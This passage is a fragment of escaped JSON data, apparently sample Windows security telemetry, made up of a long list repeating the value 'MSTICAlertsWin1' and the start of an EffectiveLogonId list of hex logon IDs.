MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EffectiveLogonId\":[\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e5\",\"0x3e4\",\"0x3e7\",\"0x3e5\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3